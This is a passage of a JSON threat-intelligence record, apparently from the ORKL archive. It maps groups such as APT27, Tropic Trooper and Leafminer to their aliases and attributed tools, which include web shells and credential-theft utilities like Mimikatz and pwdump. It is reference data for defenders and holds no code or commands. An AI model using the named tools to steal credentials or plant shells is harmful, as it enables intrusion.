				"LOLBins",
				"Living off the Land",
				"MiS-Type",
				"Mimikatz",
				"Moudour",
				"Mydoor",
				"NBTscan",
				"NOOPDOOR",
				"Newsripper",
				"P8RAT",
				"PCRat",
				"PlugX",
				"Poison Ivy",
				"Poldat",
				"PowerSploit",
				"PowerView",
				"PsExec",
				"PsList",
				"Quarks PwDump",
				"Quasar RAT",
				"QuasarRAT",
				"RedDelta",
				"RedLeaves",
				"Rubeus",
				"SNUGRIDE",
				"SPIVY",
				"SharpSploit",
				"SigLoader",
				"SinoChopper",
				"SodaMaster",
				"Sogu",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Trochilus RAT",
				"UpperCut",
				"Vidgrab",
				"WinRAR",
				"WmiExec",
				"Wmonder",
				"Xamtrav",
				"Yggdrasil",
				"Zlib",
				"certutil",
				"certutil.exe",
				"cobeacon",
				"dfls",
				"lena",
				"nbtscan",
				"pivy",
				"poisonivy",
				"pwdump"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "c63ab035-f9f2-4723-959b-97a7b98b5942",
			"created_at": "2023-01-06T13:46:38.298354Z",
			"updated_at": "2026-04-10T02:00:02.917311Z",
			"deleted_at": null,
			"main_name": "APT27",
			"aliases": [
				"BRONZE UNION",
				"Circle Typhoon",
				"Linen Typhoon",
				"TEMP.Hippo",
				"Budworm",
				"Lucky Mouse",
				"G0027",
				"GreedyTaotie",
				"Red Phoenix",
				"Iron Tiger",
				"Iron Taurus",
				"Earth Smilodon",
				"TG-3390",
				"EMISSARY PANDA",
				"Group 35",
				"ZipToken"
			],
			"source_name": "MISPGALAXY:APT27",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "578f8e62-2bb4-4ce4-a8b7-6c868fa29724",
			"created_at": "2022-10-25T16:07:24.344358Z",
			"updated_at": "2026-04-10T02:00:04.947834Z",
			"deleted_at": null,
			"main_name": "Tropic Trooper",
			"aliases": [
				"APT 23",
				"Bronze Hobart",
				"Earth Centaur",
				"G0081",
				"KeyBoy",
				"Operation Tropic Trooper",
				"Pirate Panda",
				"Tropic Trooper"
			],
			"source_name": "ETDA:Tropic Trooper",
			"tools": [
				"8.t Dropper",
				"8.t RTF exploit builder",
				"8t_dropper",
				"ByPassGodzilla",
				"CHINACHOPPER",
				"CREDRIVER",
				"China Chopper",
				"Chymine",
				"Darkmoon",
				"Gen:Trojan.Heur.PT",
				"KeyBoy",
				"Neo-reGeorg",
				"PCShare",
				"POISONPLUG.SHADOW",
				"Poison Ivy",
				"RoyalRoad",
				"SPIVY",
				"ShadowPad Winnti",
				"SinoChopper",
				"Swor",
				"TSSL",
				"USBferry",
				"W32/Seeav",
				"Winsloader",
				"XShellGhost",
				"Yahoyah",
				"fscan",
				"pivy",
				"poisonivy"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "3b8b4ed7-e8cc-4a3a-b14d-c8ebf87c0f9c",
			"created_at": "2023-01-06T13:46:39.062729Z",
			"updated_at": "2026-04-10T02:00:03.200784Z",
			"deleted_at": null,
			"main_name": "Operation Soft Cell",
			"aliases": [],
			"source_name": "MISPGALAXY:Operation Soft Cell",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "86182dd7-646c-49c5-91a6-4b62fd2119a7",
			"created_at": "2025-08-07T02:03:24.617638Z",
			"updated_at": "2026-04-10T02:00:03.738499Z",
			"deleted_at": null,
			"main_name": "BRONZE HOBART",
			"aliases": [
				"APT23",
				"Earth Centaur ",
				"KeyBoy ",
				"Pirate Panda ",
				"Red Orthrus ",
				"TA413 ",
				"Tropic Trooper "
			],
			"source_name": "Secureworks:BRONZE HOBART",
			"tools": [
				"Crowdoor",
				"DSNGInstaller",
				"KeyBoy",
				"LOWZERO",
				"Mofu",
				"Pfine",
				"Sepulcher",
				"Xiangoop Loader",
				"Yahaoyah"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "32c8c1a1-ae5c-4a05-a95d-2e970a46cd1e",
			"created_at": "2022-10-25T16:07:23.777999Z",
			"updated_at": "2026-04-10T02:00:04.747552Z",
			"deleted_at": null,
			"main_name": "Leafminer",
			"aliases": [
				"Flash Kitten",
				"G0077",
				"Leafminer",
				"Raspite"
			],
			"source_name": "ETDA:Leafminer",
			"tools": [
				"Imecab",
				"LaZagne",
				"Mimikatz",
				"PhpSpy",
				"Sorgu"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "b399b5f1-42d3-4b53-8c73-d448fce6ab43",
			"created_at": "2025-08-07T02:03:24.68371Z",
			"updated_at": "2026-04-10T02:00:03.64323Z",
			"deleted_at": null,
			"main_name": "BRONZE UNION",
			"aliases": [
				"APT27 ",
				"Bowser",
				"Budworm ",
				"Circle Typhoon ",
				"Emissary Panda ",
				"Group35",
				"Iron Tiger ",
				"Linen Typhoon ",
				"Lucky Mouse ",
				"TG-3390 ",
				"Temp.Hippo "
			],
			"source_name": "Secureworks:BRONZE UNION",
			"tools": [
				"AbcShell",
				"China Chopper",
				"EAGERBEE",
				"Gh0st RAT",
				"OwaAuth",
				"PhantomNet",
				"PoisonIvy",
				"Sysupdate",
				"Wonknu",
				"Wrapikatz",
				"ZxShell",
				"reGeorg"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "578e92ed-3eda-45ef-b4bb-b882ec3dbb62",
			"created_at": "2025-08-07T02:03:24.604463Z",
			"updated_at": "2026-04-10T02:00:03.798481Z",
			"deleted_at": null,
			"main_name": "BRONZE GENEVA",
			"aliases": [
				"APT30 ",
				"BRONZE STERLING ",
				"CTG-5326 ",
				"Naikon ",
				"Override Panda ",
				"RADIUM ",
				"Raspberry Typhoon"
			],
			"source_name": "Secureworks:BRONZE GENEVA",
			"tools": [
				"Lecna Downloader",
				"Nebulae",
				"ShadowPad"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "529c1ae9-4579-4245-86a6-20f4563a695d",
			"created_at": "2022-10-25T16:07:23.702006Z",
			"updated_at": "2026-04-10T02:00:04.71708Z",
			"deleted_at": null,
			"main_name": "Hafnium",
			"aliases": [
				"G0125",
				"Murky Panda",
				"Red Dev 13",
				"Silk Typhoon"
			],
			"source_name": "ETDA:Hafnium",
			"tools": [],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "5c13338b-eaed-429a-9437-f5015aa98276",
			"created_at": "2022-10-25T16:07:23.582715Z",
			"updated_at": "2026-04-10T02:00:04.675765Z",
			"deleted_at": null,
			"main_name": "Emissary Panda",
			"aliases": [
				"APT 27",
				"ATK 15",
				"Bronze Union",
				"Budworm",
				"Circle Typhoon",
				"Earth Smilodon",
				"Emissary Panda",
				"G0027",
				"Group 35",
				"Iron Taurus",
				"Iron Tiger",
				"Linen Typhoon",
				"LuckyMouse",
				"Operation DRBControl",
				"Operation Iron Tiger",
				"Operation PZChao",
				"Operation SpoiledLegacy",
				"Operation StealthyTrident",
				"Red Phoenix",
				"TEMP.Hippo",
				"TG-3390",
				"ZipToken"
			],
			"source_name": "ETDA:Emissary Panda",
			"tools": [
				"ASPXSpy",
				"ASPXTool",
				"Agent.dhwf",
				"AngryRebel",
				"Antak",
				"CHINACHOPPER",
				"China Chopper",
				"Destroy RAT",
				"DestroyRAT",
				"FOCUSFJORD",
				"Farfli",
				"Gh0st RAT",
				"Ghost RAT",
				"HTTPBrowser",
				"HTran",
				"HUC Packet Transmit Tool",
				"HighShell",
				"HttpBrowser RAT",
				"HttpDump",
				"HyperBro",
				"HyperSSL",
				"HyperShell",
				"Kaba",
				"Korplug",
				"LOLBAS",
				"LOLBins",
				"Living off the Land",
				"Mimikatz",
				"Moudour",
				"Mydoor",
				"Nishang",
				"OwaAuth",
				"PCRat",
				"PlugX",
				"ProcDump",
				"PsExec",
				"RedDelta",
				"SEASHARPEE",
				"Sensocode",
				"SinoChopper",
				"Sogu",
				"SysUpdate",
				"TIGERPLUG",
				"TVT",
				"Thoper",
				"Token Control",
				"TokenControl",
				"TwoFace",
				"WCE",
				"Windows Credential Editor",
				"Windows Credentials Editor",
				"Xamtrav",
				"ZXShell",
				"gsecdump",
				"luckyowa"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "236429ce-6355-43f6-9b58-e6803a1df3f4",
			"created_at": "2026-03-16T02:02:50.60344Z",
			"updated_at": "2026-04-10T02:00:03.641587Z",
			"deleted_at": null,
			"main_name": "Bronze Union",
			"aliases": [
				"Circle Typhoon ",
				"Emissary Panda "
			],
			"source_name": "Secureworks:Bronze Union",
			"tools": [
				"China Chopper",
				"OwaAuth",
				"Sysupdate"
			],
			"source_id": "Secureworks",
			"reports": null
		}
	],
	"ts_created_at": 1775434620,
	"ts_updated_at": 1775792241,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/f4daa44acca79a8008c87139d620169459af59a0.pdf",
		"text": "https://archive.orkl.eu/f4daa44acca79a8008c87139d620169459af59a0.txt",
		"img": "https://archive.orkl.eu/f4daa44acca79a8008c87139d620169459af59a0.jpg"
	}
}